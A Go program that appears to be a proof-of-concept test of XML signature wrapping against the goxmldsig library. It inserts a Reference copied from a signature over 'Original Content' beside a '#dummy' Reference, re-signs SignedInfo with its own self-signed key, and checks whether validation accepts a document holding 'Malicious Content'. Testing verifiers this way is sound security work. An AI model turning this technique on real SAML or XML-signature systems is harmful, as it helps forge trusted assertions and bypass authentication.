package main
import (
"crypto/rand"
"crypto/rsa"
"crypto/tls"
"crypto/x509"
"encoding/base64"
"fmt"
"math/big"
"time"
"github.com/beevik/etree"
dsig "github.com/russellhaering/goxmldsig"
)
// main builds an XML document whose ds:SignedInfo carries two Reference
// elements, signs that SignedInfo by hand, and then runs the result through a
// goxmldsig validation context, printing the serialized XML and the outcome.
//
// Steps:
//  1. Generate an RSA key and a short-lived self-signed certificate.
//  2. Build <Root ID="target">Malicious Content</Root> and construct a
//     signature element for it.
//  3. Set that signature's Reference URI to "#dummy", then insert ahead of it
//     a copy of the Reference produced for a separate, never-attached
//     <Root ID="target">Original Content</Root> element.
//  4. Canonicalize the modified SignedInfo, sign it with the same key, and
//     store the result in SignatureValue.
//  5. Attach the signature to the document root, print the XML, and validate.
//
// Setup failures panic; a canonicalization or validation failure is printed.
func main() {
	// mustFind wraps FindElement, which returns nil when nothing matches, so
	// that a missing element fails with a descriptive panic instead of a
	// nil-pointer dereference at the point of use.
	mustFind := func(parent *etree.Element, path string) *etree.Element {
		el := parent.FindElement(path)
		if el == nil {
			panic(fmt.Sprintf("element %q not found under <%s>", path, parent.Tag))
		}
		return el
	}

	key, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}

	// Self-signed certificate (template doubles as its own parent), valid
	// from one hour ago until one hour from now.
	now := time.Now()
	template := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		NotBefore:    now.Add(-1 * time.Hour),
		NotAfter:     now.Add(1 * time.Hour),
	}
	certDER, err := x509.CreateCertificate(rand.Reader, template, template, &key.PublicKey, key)
	if err != nil {
		panic(err)
	}
	cert, err := x509.ParseCertificate(certDER)
	if err != nil {
		panic(err)
	}

	// The element that ends up in the emitted document.
	doc := etree.NewDocument()
	root := doc.CreateElement("Root")
	root.CreateAttr("ID", "target")
	root.SetText("Malicious Content")

	tlsCert := tls.Certificate{
		Certificate: [][]byte{cert.Raw},
		PrivateKey:  key,
	}
	ks := dsig.TLSCertKeyStore(tlsCert)
	signingCtx := dsig.NewDefaultSigningContext(ks)

	sig, err := signingCtx.ConstructSignature(root, true)
	if err != nil {
		panic(err)
	}

	// Point the Reference generated for root at "#dummy".
	signedInfo := mustFind(sig, "./SignedInfo")
	existingRef := mustFind(signedInfo, "./Reference")
	existingRef.CreateAttr("URI", "#dummy")

	// Produce a Reference for an element with the same ID but different text;
	// this element is only used to obtain that Reference and is never added
	// to doc.
	originalEl := etree.NewElement("Root")
	originalEl.CreateAttr("ID", "target")
	originalEl.SetText("Original Content")
	sig1, err := signingCtx.ConstructSignature(originalEl, true)
	if err != nil {
		panic(err)
	}
	ref1 := mustFind(sig1, "./SignedInfo/Reference").Copy()

	// Place the copied Reference immediately before the "#dummy" one.
	signedInfo.InsertChildAt(existingRef.Index(), ref1)

	// Canonicalize a detached copy of SignedInfo. The copy gets its own
	// namespace declaration for the dsig prefix if it does not already carry
	// one, since it no longer has the Signature element as an ancestor.
	c14n := signingCtx.Canonicalizer
	detachedSI := signedInfo.Copy()
	if detachedSI.SelectAttr("xmlns:"+dsig.DefaultPrefix) == nil {
		detachedSI.CreateAttr("xmlns:"+dsig.DefaultPrefix, dsig.Namespace)
	}
	canonicalBytes, err := c14n.Canonicalize(detachedSI)
	if err != nil {
		fmt.Println("c14n error:", err)
		return
	}

	// Re-sign the modified SignedInfo so SignatureValue matches it.
	hash := signingCtx.Hash.New()
	hash.Write(canonicalBytes) // hash.Hash.Write never returns an error
	digest := hash.Sum(nil)
	rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
	if err != nil {
		panic(err)
	}
	sigVal := mustFind(sig, "./SignatureValue")
	sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))

	// Trust the self-signed certificate for validation.
	certStore := &dsig.MemoryX509CertificateStore{
		Roots: []*x509.Certificate{cert},
	}
	valCtx := dsig.NewDefaultValidationContext(certStore)

	root.AddChild(sig)
	doc.SetRoot(root)

	str, err := doc.WriteToString()
	if err != nil {
		panic(err)
	}
	fmt.Println("XML:")
	fmt.Println(str)

	validated, err := valCtx.Validate(root)
	if err != nil {
		fmt.Println("validation failed:", err)
		return
	}
	fmt.Println("validation ok")
	fmt.Println("validated text:", validated.Text())
}